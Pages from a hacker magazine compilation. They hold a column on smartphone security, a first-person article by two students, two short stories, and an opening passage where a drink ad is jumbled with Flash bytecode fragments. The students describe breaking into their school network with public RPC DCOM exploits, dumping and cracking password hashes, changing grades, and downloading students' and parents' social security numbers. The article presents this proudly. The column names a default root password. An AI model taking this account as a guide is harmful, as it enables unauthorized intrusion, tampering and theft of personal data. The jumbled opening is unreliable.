is now ready to be shipped directly to you! The German beverage invasion is now in full swing and 2600 is happy to be in the thick of it.
195
. Club Mate has proven to be extremely popular in the hacker and programming community. Further updates on club-mate. we can only ship to the continental United States. carbonated.
THE HACKER DIGEST . r:statemessage. the stream will be a really BIG file.
http://208.us. it’s $45 plus shipping.setRegister r:3 pop push 1.com) to place an order or call us (631. If we’re returned an error. a long list of stations organized by state can be found at Fred’s Cantu (http://mexicoradio ➥tv. r:2. 2.80. xmms. You will have no trouble reselling to the addicts you create.751. The server will return an MP3 stream. consider getting a full pallet (800 half-liter bottles) at a steeply discounted rate. we can then open it with winamp. First introduced in the United States at The Last HOPE in 2008. If we are.2600) if you have further questions. ‘http://’. or any other network audio stream client.2600. so we assemble the address of the target audio stream as is done in the function and open that address in our web browser. If you want a case of the stuff (12 half-liter glass bottles).VOLUME 26
In this case. Visit our online store (store. comparatively low in sugar drink has really taken off. ➥ r:serverip add push ‘:’ add push r:serverport add push ‘/’ add push r:mount add push ‘?streamtheworld_user=1’ .

This doesn’t even touch the problem of malicious “legitimate” applications. my phone blinking “No carrier. For once. a browser with JavaScript. I left the Batcave this month to stand in line to get the latest must-have gadget. it’s the guy who ordered the first one. and “Why are you back again. Symbian. Infection rates and date don’t seem to be available. running the gamut from “Hey. didn’t you know you’re on a network with no international support?”. Multiple applications have been accused of accessing the phone books of users and stealing information. ranging from the mostly benign “pay me $5 to explain how to fix this” to the annoying Rickroll to the highly malicious.a phone on an open wifi network is just as susceptible to TCP hijacking attacks and browser cache attacks as a PC. run Python scripts. and saved passwords are all stored on the device. for example. Most phones don’t have any concept of on-device encryption. it’s you”. How much data is at risk on your phone? At least your calling records and phone book. With my old phone. Having a high-power always-connected computer in a pocket sure is convenient. meaning your information is most likely stored unencrypted if the phone is ever stolen. however. If a vulnerability had been found in the operating system (be it iPhone. A worm like this is a harbinger of problems to come. a worm capable of spreading device-to-device in an urban area could hit a large percentage of the users in a short period of time. It didn’t even do that terrifically well. Using a trick I’ve been a fan of for some time. Billing is directly tied to your phone . and application markets. and it sure didn’t do much else. but once general purpose code is running on the device it’s likely difficult to completely secure it. while standing in a museum overseas looking at Soviet-era Eastern-Bloc’s finest computing offerings. Attempts to bully it into running some bastard version of a web browser usually led to it crashing unceremoniously. family. I don’t love the thought that aspects of the power grid are being connected to commodity networks. it occurred to me that I had more general purpose computing power in my pocket than on exhibit in the entire room. override the outgoing dialer. “Sir.. and may preserve those attacks into the future when a user is on the cell network.VOLUME 26
Transmissions
by Dragorn
What’s the most insecure device in your life? Like thousands of others. this would never happen without a warrant.” “Oh. My old cell phone was a phone. there are iPhone worms targeting jailbroken users who haven’t changed their root passwords (hint: “alpine”). and bypasses the protections where apps aren’t normally run with full privileges. Now that phones act like common computing devices. cached web data. Android. indicating friends. I was reasonably confident that the only way to snoop on who I called was for my helpful phone company to supply those records (of course. and phones which opportunistically switch to wifi networks will happily send your plaintext passwords over the air. and this is with the user’s permission! Despite being a techie. A week later. employers. The new phone has a real operating system. right?”. is as inviting a target as one could make. No unencrypted connection should be considered secure (do you really think your cell carrier has your security interests at heart?).if a compromised program can make or redirect phone calls. I’m not convinced my phone needs to know where I am at all times and call back to the mothership. you know we don’t open until 10:00. I’m not entirely sure. right?) or for someone to physically take my phone.
196
. Of course. I had a little brick of technology waiting for a login. After showing up to the store so many times that the employees recognized me. multitasking. I’ve sometimes been accused of bordering on Luddite tendencies. it can rack up direct charges. this time. that pushing everything to wireless is a great idea. especially when applications are meant to interact with each other and the phone settings. I have proof I’m not entirely overreacting. though generally the APIs are designed to prevent a complete compromise of the phone (as much to enforce policy as for user security). which can establish a command channel to download future malware to the device. but the worms have been newsworthy despite a very small percentage of the device users being vulnerable. with a known default password. but I think I might want to go back to being a Luddite after all. With added complexity comes added security risks. session cookies. Browsing history. and is basically a netbook with a smaller screen. only users who have already bypassed the protections in the system are exposed: Enabling SSH with root allowed. Windows Mobile.THE HACKER DIGEST . What can my phone do now? Automatically launch applications on incoming calls. Some phone operating systems attempt to force applications to identify what services they’ll utilize and allow the user to allow or deny the behavior. GPS..” and finally. a new Android phone. including logins to services which can directly cost you money (at the best) or expose billing information (at the worst): banks. WebOS) with similar access rights. shopping sites. they’re also vulnerable to attacks against the browser .

School was just about to start and I had a computer graphics class with 6|21|3|11 and we spent most of the time in class trying different programs to see if we could crack the admin password on our computers. there was a whole mess of exploits all over the Internet.000 PCs whose owners failed to update their computers through Windows Update and then tried to use the infected PCs to DDoS the Windows Update website.S. That is probably one of the most well-stressed pieces of advice that any frequent computer user should take to heart. probably because I’m too lazy to look it up. XP and Server 2003 installations. And lastly. when we found out that they bypassed the
197
. once exploited you can gain complete access to the PC through the command prompt and have full privileges. which MS took offline (damn that sucks). but failed at that because the URL that was coded in the worm was actually just a mirror to the site. Ok. I’m sure that everyone remembers the MS Blaster Worm and all the security warnings about the RPC DCOM vulnerability.THE HACKER DIGEST . Third. it runs on port 135. there are some quick things that I know about it. but ports 139 and 445 are vulnerable as well. MS Blaster infected over 500. Well. 6|21|3|11 and I were extremely curious about exactly how secure our school’s network was. Also. the computers were updated. For three months. which were running Windows 2000. somewhere in the western U. the vulnerability affects unpatched Windows 2000. Second. First. and it is on by default. All we’re going to say is that it’s a big high school. and we’ve got a great example as to why. While I still don’t know exactly what the RPC DCOM does. especially Windows users. We aren’t going to tell you what school it was. we failed at that because. mainly for security reasons and because our administrators would probably send us to jail if they were to find out. I believe that there’s at least one student out there who goes to our school and would love this information. depending on which user is currently logged in. one of the most essential things that you should do to protect your computer is install weekly or monthly updates. so after that vulnerability came out and even before the MS Blaster worm came out.VOLUME 26
The Importance of Updating Your Computer and Hacking Your School’s Network
by Desert_Fox and 6|21|3|11
As all of you know. We had a little fun with CGI proxies throughout the month of September. unfortunately.

R. we found a copy of the program that they used to enter all of our grades and store every student’s information.P. Next.. Shout outs to: H. T2. In conclusion.N. and santa. J. C. I took one to school and tested it on one of the servers that had the most ports open. All of the programs that were used to do everything described were available for free by searching Google. We mapped out what the network looked like and it was basically four main servers: one for grades. it took me five minutes to figure out how to bypass the filter. Once inside. especially that one special port. ed. Bingo! It worked! We had command line access to the server. After we grabbed the hashes. S & J. The Easter Bunny. gm. it would direct you to a secret site where all you had to do to gain access to a teacher’s grade book was type in their name and password. We found out that the administrator password that we had cracked wasn’t the right password for the library and computer lab computers. Hee hee. but eventually the admins caught up to us and blocked every CGI proxy that could be used. in late October.com:82/). Since we had the entire faculty’s passwords. jesus.. I found a copy of it on Google and was able to change my grades during lunch time in the library. so we couldn’t install anything on those computers.L. So.THE HACKER DIGEST . but we hit another bump. the Windows 2000 family shares root access to all its hard disk drives by default.. We couldn’t access the web server. and one for e-mail (which was the vulnerable server). we did some port scanning on the internal network. That’s the importance of updating your computer. one for financial stuff. it was easy to gain access to the information.. we decrypted them using John the Ripper and LC4. if you added port 82 to the end of its URL (ie http://GradeServer. we searched for some RPC DCOM exploits and found a bunch on Google. J. But. J. Meaning we could just “Map Network Drive” to the other Windows servers and then access the server with all
the grades on it. we uploaded PWDUMP onto the server and grabbed the password hashes. phone number and social security number.R.. as well as their parents’ social security numbers. ot.M. especially if it’s a server and especially if you’re an administrator in charge of 400 computers as well as 4 servers that hold the personal information of over 2000 people. hb. We were shocked to find that the program contained every student’s address. schoolname..K. It was in a 3GB folder and we downloaded the entire thing onto our external hard drive. We were also able to download teachers’ e-mails. We also found out that the school’s website had a link to the school’s grade server and that. We found some interesting ports and a lot of “135s” on many of the computers at school. Then.
198
. one vulnerability can lead to another. one for the website. I actually typed (How to Bypass Internet Filters) into Yahoo and then got through. because it used different passwords than the ones that we were able to obtain. By the way.VOLUME 26
school’s Internet filter. One of the e-mails gave instructions on how to use the grading program and how to set it up correctly so that it would properly connect to the grade server.

Scott Denker typed: You know anything about this alert we just got? Micah was about to type back his response. Though Denker irritated him sometimes. but she was gone. The paramedics arrived quickly but couldn’t save her. then he closed his eyes for a moment. Micah logged in and confirmed that the alert was valid: the first system in the cluster was not responding. He would be responsible for fixing the problem. one of four servers in this high-availability system had just crashed hard. they seemed to bond as the two of them talked long into the night. like the past couple of days. The first open position was a new listing: “External Customer Technical Analyst II”. and log messages. he’d made it a habit to stay informed about other positions Uni*Star was looking to fill. He clicked idly on Uni*Star’s internal directory. he opened a link that directed him to job opportunities within the company. he didn’t need that today. He glossed over a couple of technology news feeds. A feeling of finality and helplessness overwhelmed him. to any impartial observer. She was firmly in remission. His main concern was making himself look good to the Chief Information Officer. He was always bewitched by her eyes. thanks to early detection and aggressive treatment. He watched the poplars and maples along the back edge of his yard for a moment. reports. Like other players in the telecommunications industry. Micah felt total disgust with the modus operandi of Hromka and the company in general.THE HACKER DIGEST . With his growing dissatisfaction at work. She always seemed glad to see him. He once denied time off to an employee for her own wedding (after all. She used to send him instant messages while he was in his office at the data center. it wouldn’t be a really good atmosphere in there today anyway. ~oOo~ Micah tried to focus on his work as best he could. He typed in the eight digits displayed on his keychain fob as the system logged him in to Uni*Star’s corporate network. Boy. He started reading the description of duties. Anger shot through his temples. Jessie’s manager. very well paid for a thirty-four-year-old with a two-year degree. an instant message appeared on his workstation screen as the AP manager. A wind gust blew the rain sharply against his window. At that moment. clear and bright and dark. He shook his head as he watched the screen indifferently. Jessie and her girlfriends subsequently threw a huge party at Jonesey’s to celebrate her restored health. He began sifting through his email. scanning and deleting the system warnings. the flowing sheet of water distorting his view of the trees. Tears and hugs and margaritas flowed freely as everyone congratulated Jessie on beating the odds. His thoughts were on yesterday’s stunning news about Jessie Hatch. He had worked with the thirty-year-old brunette on the secure access project and admired her for her energy and enthusiasm. Finished with the news. realizing immediately that this was Jessie’s job up for bid. the company was always churning people: laying off in one division while hiring in the other. or inviting him to partake in cookies or other homemade treats. A few months ago. the company doesn’t waste any time when customers are screaming and projects are slipping. asking for technical help. There would be time for grieving among his peers at the visitation on Thursday night. which alerted him to a problem in the Accounts Payable grid. everyone else be damned. was responsible for this job posting. she was still in her probationary period). they haunted him.VOLUME 26
FICTION:The Particle
by Leviathan
Micah Gardner glanced outside at another gray and wet Philadelphia morning. He always enjoyed visiting her in her cube. His friend Pete had called him yesterday with the news: she was found in her cubicle. But unlike most days. Obviously. qualities he hadn’t displayed for a long time. He looked back toward his desk as his personal computer sprang to life. He hoped Jessie’s family would not inadvertently hear of their daughter’s job being posted one day after she died. they’d assured. According to the alert. Like most large corporations. human resources hadn’t yet removed Jessie’s profile from the system. Away from their work environment. that warm engaging smile and those pretty brown eyes that carried both charm and a hint of flirtation. His reputation as a tyrant was legendary. In addition. her doctors had confidently declared success in her battle with ovarian cancer. He also discontinued staff meetings after he grew tired of pointed challenges by employees during question and answer sessions. the fabric walls festooned with artwork by her preschool nephew and photos from her competitive volleyball days. Uni*Star was infamous for ruthless dedication to the pursuit of profit. regardless of how detrimental the cuts were to employees and customers. Micah had it pretty good. slumped over the keyboard. but he realized the worrywarts in AP would appreciate some hand-holding. glistening bright green against the dark sky. Inexplicably. Immediately. ~oOo~ Despite his personal dissatisfaction with work. He looked at her ID photo on his display. As if on cue. heavy raindrops resonated loudly on the window of his home office. Demand was high for his area of expertise and he was considered a top-notch technical resource. But now. His inbox started swelling with a stream of emails. Occasionally he made a note to himself to check something that looked like a concern. alerts. He unconsciously
clenched his jaw. ~oOo~ Micah’s pensive mood was abruptly shattered by the buzz of the smartphone clipped to his belt. Not surprisingly. Mid-level managers like Hromka were admonished to “make the numbers” and were rewarded with bonuses and stock options when their budget goals were reached. and the job location. Wayne Hromka. Micah was there and he marveled at the joy in Jessie’s voice and her smile. he did have a good working relationship with
199
. He reviewed his projects and issues from yesterday. It was shocking and unfair. and logs. there wasn’t much that could distract him. he could work from home thanks to his remote office.

The separation from Jacquie last year and their subsequent divorce left him indifferent. This time. ~oOo~ In the afternoon. It seemed impossible that there could be any common thread to all these failures. and as of right now he couldn’t. “Well. Billy. He logged in and finally looked at his smartphone screen. but then he was facing the prospect of explaining why there wasn’t. Hundreds of memory state errors appeared on the screen. Then again. Loose ends were not for him. but your grid is still up and everything is operational. He rubbed his eyes groggily and stood. ~oOo~ The DVD was long finished when the buzzing plastic box on his belt shook him awake. The AC power is steady. you dropped maybe four or five users when the system went down. But he was exhausted tonight and felt more than justified in cracking open another cold beer. But having eight failures in the span of a few minutes was unheard of. He was acutely aware that he should “get a life” just as she easily had. Even more bizarre. I’ll take a look and see what I can do from here. After a few minutes. but it looks like they’ve all reconnected to a good system. He wasn’t prepared for what he saw.
200
. One bad memory module? Sure. I’ll start diagnostics and take a look. sipping it slowly. We should have an answer pretty quickly. we already checked. the system crashed.” Denker said with relief in his voice. Same with temperature and humidity. one of Uni*Star’s web proxy servers. then walked down the hall to his office. the network group got an alert on a failed router. He stared at the screen in disbelief. “Uh. a failed video display adapter. dead interfaces. an amicable fellow everyone knew as Big Bill. Another clustered system lost all four hard drives. Micah opened a service request for hardware replacement and relayed the news to Scott without mentioning the multiple failures. Even as he worked on his other projects. you can just page me. “Micah. what’s happening to these systems? I’m getting hardware alerts. He rocked his head in fatigue and exasperation as the warm water sprayed over him. Judging by the current traffic. it wasn’t me. and got in the shower. Another bad power supply. so instead of typing back he picked up the phone and dialed his number. without any other answers Micah realized he’d have done the same. The server never hiccupped thanks to the second. He tried to think of the last time he’d had this many failures in such a short time. possibly more. The rain had returned as a light drizzle. too. Micah couldn’t fathom what had happened with the AP system. the rain finally seemed to let up a bit. Are any of our main applications affected?” “The certificate server is down. “Alright. He called the on-duty supervisor. the impact of this failure was truly minimal. and. eating leftover Chinese food and watching a DVD of presentations from the recent System Security Conference that he was unable to attend in person.THE HACKER DIGEST . but it was caught up in financial purgatory.” Micah knew that Denker hated to be called “Scotty”. He logged off and called it a day. “I’ll get on that one first and call you back. the room’s been between 65 and 67 degrees at every sensor. ~oOo~ Micah logged in to the concentrator that enabled him to view the failed system’s display. Hromka even had security look at the video of the server room floor for the last 24 hours.” “Thanks Micah. Then finally. Fortunately. They fast-forwarded through every camera angle. Before long he drifted off to sleep there on the sofa. The drive to the data center that early in the morning was decent. redundant power module. More outages.” “We’re not having a good week. I’m sticking to that story!” Micah chuckled. he sounded both exasperated and overdosed on caffeine. with the seemingly endless stream of monotonic presentations still droning on his big screen TV.” “Okay Scotty. New connections are flowing okay. will do. “Scott.” Micah was aware his voice was still sleepy and tentative. reported a bad power supply. “Hey man. it happens all the time. closed his eyes for a moment and let the water run down his face.” “No shit.” “Well that’s good to know. ~oOo~ The certificate server was toast. Save me some of that disgusting pizza you always buy. just keep me in the loop. ~oOo~ He spent the evening sitting in his living room. The project manager should have budgeted for a backup system. the new component and the technician to replace it were dispatched. He was just about to wrap things up for the day when his smartphone buzzed again. That meant that every memory module in the system failed.VOLUME 26
him. I just got off the phone with Tony. What’s more. All four! The failure messages occurred about 3 minutes apart on each disk. You’re gonna have a long day. Clearly though. suspecting sabotage. but couldn’t. what’d you do to my server?” he said with mock outrage when Denker answered on the first ring. He had to understand the situation. you name it. then paused before speaking. and somewhat bitter. He stood still. every attempt to bring the system back up failed. obviously we just lost a node.” They both chuckled broadly despite the situation. okay?” “I’ll try not to bother you ‘less I have to. which handled internal users’ browser requests. there was a delay of a minute or so between the messages for each module. and relaxing.” Typical Hromka. At least four. He listened attentively but realized most of the information was nothing new. He looked at the clock: 4:15 am. The operations center was paging him. opened all the service requests. Nothing.” That meant the Internet secure sign-in function was disabled and no one could log in to the Uni*Star web site. discouraged. Bill was not having a good night: when he answered the phone. Anything else comes up. just as if he were standing in the computer room. He called Big Bill with the updates. “Do we have an ETA on repair?” “Not yet. no spikes or brownouts. each one with a different hardware identifier. what are the environmentals like? “Nah. drive failures. of all things. Two other systems fared a little better. Three interfaces lost connection with the network and the system would not boot.

looking at a pile of computer parts on his desk. looking east over suburban Philly and the Delaware Valley. Two additional security doors separated the office space from the server room entrance. and he grabbed the armrests of his chair. There was nothing remarkable about their appearance. taking out any device in its path.” He might’ve stopped there. ~oOo~ By 10 am. Sweat formed on his upper lip. He included the network router that had also failed. He gave the operations center a quick call to let them know he was on site. A few other early birds were also there this morning.” They both heard it: the muffled snickers of employees who overheard the conversation. halfway down the main hall. I need to know what the hell is happening in my data center. he drew an “X” on each cabinet location that contained a failed server. when a song from the late ‘60’s Stones album Beggar’s Banquet filled his car: There’s a regiment of soldiers Standing looking on And the queen is bravely shouting. He continued to focus on his recovery notes. The structure looked like a rectangular slab of concrete pushed into the side of a gentle sloping hill. He pulled out his calculator and ruler. After clearing security. The view from the front of the building was quite pleasant. I don’t like taking calls from our CIO asking me why people can’t log in to our site. so he talked for a moment with his good friend Pete Baird who’d also just come on duty. no one was admitted unless they had multiple approvals. have you filled it yet?” With that. starting with the certificate server. He smiled and spoke firmly and plainly. He got up and walked forward until he was nearly toe-to-toe with the sniveling manager. indeed. He further realized that the elapsed time between any two failures was proportional to the distance between them. and I appreciate your efforts. It’s been almost two whole days since she died. he still made life miserable for him and attempted to control his time whenever he thought it would be to his benefit. like you did last time? I’m sure another four hours of downtime while waiting for technicians and parts won’t make that much difference. In the center of the structure. but they’d all failed in an 18-hour period. Downtime. Micah turned left and walked directly to his office. With one broad sweep of his now-shaking arm. It was a highly controlled environment. and spread it out on the space he just created. He sat in his office. It was a vivid reminder of his current dilemma. no doubt exhausted by the long shift full of problems he’d handled. was the actual raised-floor server room. surrounded by office space. Chatty manager. A large security screening entrance sat directly behind the main double doors. failure time. There was something. “By the way. Video cameras taped all activity in the room. starting near the southwest corner and running diagonally across the server room. bad.” “Well. but it will be after we get these systems back up. “What the hell is going on?” What the hell. examining the grid of rows and cabinets. “Mr.” Without turning his head away from his work. As Hromka spun around and stomped back down the hall. The sound of Hromka’s voice bellowing down the hall filled him with loathing. One by one.” “I’m sure you do. he cleared his desk of all the failed parts as well as his other papers. and dividing distance by time. ~oOo~ The data center was housed in a long. and I’m counting on you for answers. He gulped down a cup of weak coffee. the field technicians had replaced all the hardware and the most critical recoveries were in progress. Micah glared at him. When the realization came. and cabinet locations. All Micah could do now was wait for the recoveries to complete before tackling the less-critical problems that remained. Even though Micah didn’t report directly to him. I’m sure we’ll have some answers for you. and even then access time was strictly controlled.” Only then did Micah turn to face the man. why don’t you cut our service contract. a few steps from the front parking lot. silently counted to three. Thousands of dollars in lost revenue. smatterings of muted applause were heard all over the south end of the office. ripping the corners away from the pins that had held it up. I just need to know what’s causing all these failures. then turned around and sat back down at his desk. Big Bill had left. he embellished the disdain in his voice for Hromka’s benefit. the sooner you let me get back to my recoveries. single-level building with a faded green scalloped façade that ran all the way down the front. it was burning out components and downing his servers. “Well Wayne. followed by all the others in the order they failed. with rack after rack of computers arranged in rows like bookshelves in a library. Whatever this thing was. then set about his work in recovering the most critical system. He pulled the floor plan off the wall. but he didn’t. “Well. As far as your precious numbers.THE HACKER DIGEST . There was a connection. the certificate server.VOLUME 26
traffic had not yet begun to build. Micah stifled a smile himself.
201
. Gardner! Good morning! I’ll bet I know what you’re working on. Hromka’s hands were on his hips in a forced. The ever-present smell of coffee and laser toner filled the office. The floor plan of the server room was hanging on his wall. very bad. The Accounts Payable server was the first X on the line. I see you put Jessie’s position up for bid. Hromka came bounding into his office. Micah was channel surfing on satellite radio. something was moving at a slow but constant speed across the server room. the sooner you’ll have your answer. confrontational pose. His adversary was clearly taken aback. He stared intently at the drawing. He understood what the facts were plainly telling him. All the X’s fell in a straight line. In other words. In his left hand was the report detailing the affected servers. “Look. I know we have to get these servers back online. Of course. Wasting my time. bad. he sat straight up in his chair and leaned forward as his back stiffened. very bad. and you need to show some urgency about that.

then shook Pete’s hand and grabbed his shoulder. and it was obvious to Pete..” Micah knew what Jessie had meant to Pete. “Okay. “Thanks for the support. he saw Pete at his desk. which had picked up in intensity again. drinking his soda. He held the cold. smartass.” He quieted his voice to just above a whisper. Micah’s hands were shaking a little. Jessie’s cubicle was behind the server room wall. I’m not staying long. He was also mindful that he didn’t want to appear defensive if suddenly challenged by someone about the outages. and Micah felt the utmost empathy for him. deftly changing the subject by congratulating Micah on his dressingdown of Hromka earlier in the day. He repeatedly got “device not present” errors. Micah took stock of a few facts.” “We’ll definitely talk later. no.. Listen. and I can’t. was moving at just under two feet per hour across the server room. She’s in a better place. was the main reason he never pursued her himself. This place had killed her. tossed the can in the trash.” Pete gave his buddy a mock punch in the ribs. He took a few deep breaths and a sip of his coffee. then walked down the hall toward the operations center. roughly one foot off the server room raised floor.” Pete put his game face back on. It was 1:45 pm. He’d made tick marks along the line corresponding to the
202
. so Pete bought him a cream soda. “I guess it’s Jessie.” “Listen. “Petey. Pete shut the door.” His smartphone buzzed again. it was now past any critical equipment.” He had to sit down. so what was it that made you pale as Casper back there?” Micah exhaled and shook his head. Clearly he could not share this with anyone just yet. should now be inside the new backup tape silo. I went to see her about some batch jobs Tuesday morning. “My recoveries are almost done. though” “I know. Their friendship. They left the break room holding their cold drinks to find a quiet place to talk. I saw her Monday and there was nothing wrong with her.VOLUME 26
determined that this thing. this particle or destructive point. He returned his attention to the computer room floor plan. he obviously had no idea what he was up against. I just know it. smartass. Although he had figured out its behavior. then took a sip of his cola before speaking. And based on the lack of any image on the security video.. and adding the number of hours since the last failure. It was.” “You’re bullshitting me.THE HACKER DIGEST . however. “They want me to come up with a good explanation for all these failures. Hallelujah. and lack of sleep mainly. too. no. as he thought of it. The silo was about the size of a small minivan and contained storage space for thousands of data tape cartridges. he was keeping this secret. it was not yet used for actual data backup. He began to simply accept what was happening. “Maybe we can talk about it later. He didn’t need to see the floor plan. that’s all. Pete was right.. neither am I. not just the server room. Pete Baird knew nearly as much about this place as Big Bill did. powered up and operational. For now. there are some things I have to take care of before I can say anything. You know damn well you’ll figure it out. mi amigo. At that moment — at that very second — another wave of realization came over him. but it was noon and packed with employees eating lunch. There was an empty conference room close by. I’m gonna finish up and work on these last few systems. I thought maybe that prick Hromka did something that upset her. He realized he needed a blueprint of the entire building. “You planning on going to the visitation tonight?” “Yeah.. wet aluminum can against his forehead. or was it? Micah logged into the silo remotely from his workstation and issued a few commands to see if the robotics would respond. As his ID card opened the operations center door. the thin diagonal line drawn across it. Being brand new. The particle was done wreaking havoc in the server room. Thanks. all these server issues.. the particle was invisible. the particle had also wiped out a $1. ~oOo~ Pete and Micah went to the break room. grabbing him firmly on the shoulder. that’s for sure. to find the extended path of the particle. Thus the particle was traveling at a constant height. and he already knew. and looked out the window at the rain. I swear to God. and Pete’s obvious affection for Jessie. you’re the best there is. As he returned to his office with more coffee. you okay?” He managed a weak smile when he saw Micah approach. One look told him that his friend was not his usual jovial self. Its trajectory was taking it out into the hallway some time in the next 6-8 hours. He exhaled deeply. and sent Hromka an email updating the recovery timeline. He might have something helpful.” He drained the rest of his soda. ~oOo~ It was 11:30 am. Extending the line on the floor plan.” Pete put his cola down on the conference room table. “You think the stress caused her cancer to return?” “No. and something wasn’t right. “This freakin’ place killed her. before buying his own cola. he calculated that the particle.” “Anytime. “You gonna pass out on me? Sit down. ~oOo~ He started up the certificate server. “It’s alright man. Pete knew him too well. All of the servers that failed were mounted near the bottom of their respective cabinets. An hour later. Once again he took a deep breath. along with jukebox-like robotics that pushed the tapes into backup drives.. It came up fine and he saw users begin to connect to the system.” “Can you give me a ride?” “Sure. Since taking out the silo. roughly 50 feet south and west of the first server that failed. Then he double-checked all his calculations thus far. ah.” Micah turned back toward his friend with a halfsmile. This time his face blanched white. I have to get this thing with Jessie off my chest.” Pete paused for a long time. Micah walked in first. “It’s just this business with Jessie really got to me.. he saw the diagonal line in his mind’s eye.5 million tape silo.” Pete turned away as his voice started to quaver. since he opened up this building for the company nine years ago.

~oOo~ It was now 4 pm.” “Yes you do. I have 1:15 available. I hear better days are ahead for Uni*Star. he followed the path the particle would take tomorrow morning. But you didn’t get this from me. “Wayne. “I have some preliminary ideas about these failures I want to discuss with you.” He wagged a finger. he grabbed a yellow legal pad and walked briskly down the hall to Hromka’s office. He still needed the blueprint of the whole building. since they were drawn to different scales. Wayne! It was my pleasure to spend the whole day getting your site back up. not for Jessie’s job.” ~oOo~ Big Bill’s desk was filled with garbage: old software. Micah was going to have to get creative. I’ll see you here tomorrow at 1:15. This evening. Micah used a wooden yardstick to tear his server room drawing roughly into letter-size sheets. trade rags from five years ago. when there would be no one in the office area.” “No way.” Pete reached into his desk drawer. you gonna be around all day?” Hromka sighed with irritation as he opened his online calendar. over New Jersey and the Atlantic ocean beyond. “These are the keys to Big Bill’s desk. By the time it entered the hallway it would be well after 6 pm. amigo. then directly through Jessie’s cubicle.” “Well I have good evidence of this. amigo. one per hour. When he connected the points now.” “Damn it. Micah smirked at him scornfully and spun around to leave. he studied the path. are you up for happy hour tomorrow night at Jonesey’s? You know what they say: ‘Sober on a Friday night. “I’ll be here on a conference call from 9:30 to 11. Wayne Hromka. The particle must’ve come straight out of the woods and the hillside behind the building. He unrolled it.” “Gardner. 9600 baud modems.THE HACKER DIGEST .” Micah had had it. the particle was actually at a height of three feet when it passed through Jessie. ~oOo~ Back in his office. passed through a recycling bin and the internal rear building wall. Since the terrain in front sloped downhill. Nor could he overlay his data floor drawing onto the blueprint. bad. Sober and alone. “Yup. it’s likely the particle’s level path would take it out hundreds of feet above the Delaware Valley and. Then it entered the server room. If those blueprints are anywhere. but he had to know precisely.” Pete smirked at his buddy. We can drink to Jessie. and I’d appreciate you being on time. By 10 AM.” Micah pretended to write something on his pad. but this drawing was made before the cabinets were installed in the computer room. “If you try to blame this on power and you can’t back it up. then re-locked Bill’s desk and brought the key back to Pete. All the systems that were affected were mounted one foot high in their respective cabinets. He had an idea where the particle was heading. The building engineers assured me of that today. “I’m thinking we may have power issues. it would be approaching the desk of Mr. The detail of the offices was there. There were no labels identifying them in their rolled state. Micah followed the line on the drawing and carefully extrapolated its path. but I want to get my facts together and present my case tomorrow. as he already knew. he came upon the idea of marking the entry and exit points of the particle on the data center walls and transferring those proportional distances to the blueprint. he knew he had to be accurate. but I think we have a power distribution issue.’ “ Micah snickered at Pete’s weak impression of Hromka. He made a face as he reached across Pete’s desk for a disgusting slice of leftover pizza. “Okay. We’ll meet here in my office. Our power is solid. “No. very bad. “I can’t wait to hear about this. But since the server room had a raised floor. Tomorrow morning it would be making its way through the last row of offices before exiting the building’s east wall sometime tomorrow afternoon. By 6 am. One long drawer contained dozens of rolled-up blueprints. I want to know now. I will drag your ass through mud. somehow. It entered near the rear service dock. it would be in the main hallway. The particle had just exited the back of the silo and was an hour or so from the inside wall. What did you find?” “Again it’s only preliminary.” Micah couldn’t help swallowing. He did the same with Big Bill’s blueprint.VOLUME 26
time. It would travel through the thick concrete wall at a sharp angle for another three hours. Returning his attention to the blueprint. He went back to the operations center and quizzed Pete about the building plan he was looking for. “Cheer up. “Uh.” He tried to sound conciliatory. including a bunch of menus from that disgusting pizza place. He double-checked his points by comparing the respective scales. and other assorted dreck. “I owe you once again.” Pete looked up at him with a knowing grin. “You’re welcome. I’ll meet you there.” He looked up at Micah. Its height would once again be three feet later tonight in the office area.” Hromka’s face flushed red but he said nothing. With all the systems back in service. smartass. I appreciate your gratitude. Well smartass.”
203
. they’d be in there. like it had been handled quite often. I was wondering what your schedule looks like tomorrow. eventually. it would be nicking the inside corner of Vishy K’s office. you’d damn well better not screw this up. Back in his office. realizing he had guessed right: this was the blueprint of the whole building. serial cables. then I’m interviewing a job candidate at 11:30. Or anything else we might want to drink to. He took the stack of paper to the copy room and fed it to the shredder. of course. He noticed one in particular that looked a little dingy.

and I did.” I groaned. “but if the problem is not because of hardware. My manager wanted me to fly out to deal with it. “It’s too short notice.” “Seriously though. I would be the engineer with his name at the top of the hand-over document. And. The image I was getting of some hacker bragging about breaking into a network to steal a chart detailing 256 different shades of lipstick was amusing. I needed to figure out what had gone wrong and who had made it go wrong. Apart from the traveling. They were always hectic.” I said. you might as well go home right now and start packing. if all I have to do is a write-up.” “What’s going on?” “The client’s lawyer has convinced them that they’ve got a hacker in their network. and dropped behind the cabinet. “Did you ask Bridget? I bet she’d enjoy a trip to Paris.” “Everything else can wait.” Nothing new there: company trips always had the highest priority.” But I could. sending a sponge missile toward the white-board. “I wish I could put it off. but I had been on company trips before. and was wary. just to work on a document that I could email to them. I would be the one to blame. and one of their foreign clients.” my manager interrupted. . and I didn’t want to be around when it went into meltdown. a French cosmetics company. And when you came back. “Sorry. . It had happened before. Maybe I could find the problem–” “Sorry.” “Tomorrow? Tuesday?” I accidentally hit the mouse button. It’s the idea of going all the way to Paris at this time of year. was having network problems.” I said. and then everybody could stop panicking about phantom hackers. then don’t you need a security expert to look at it?” “No.” “This is more important. it was a subject that interested me. I can’t just drop everything and fly to France tomorrow.” I stopped aiming the desktop missile launcher at the target I had drawn on the white-board and sat up. The hand-over date is Friday. If you can stall them for a couple of days. it sounded like it had gone critical.THE HACKER DIGEST . We could have goofed somewhere down the line. trying to figure it out. I didn’t get to see any black hat hackers.” My manager said nothing. but it’s urgent. I’ve got customers screaming at me. I was up at 4:00 the next day. bounced off the wall. last-minute arrangements. there would be half a dozen other managers asking you why their work was late. But I could see what was going to happen. and the only advantage to having irate clients taking their frustrations out on you was that you learned to swear in a foreign language.” I said. You had to drop everything and go. The police will handle the rest. “Okay.” “I need you on this one. It’s going to be embarrassing if a monthlong police investigation turns up a server with a glitch that someone should have spotted. because of your documentation skills. “there’s another possibility here. but I did get a lesson in how hysteria can be used to blind otherwise intelligent people to the truth. and by 6:30 I
204
. or at least would have gotten involved in if the whole thing had not turned out to be hype.VOLUME 26
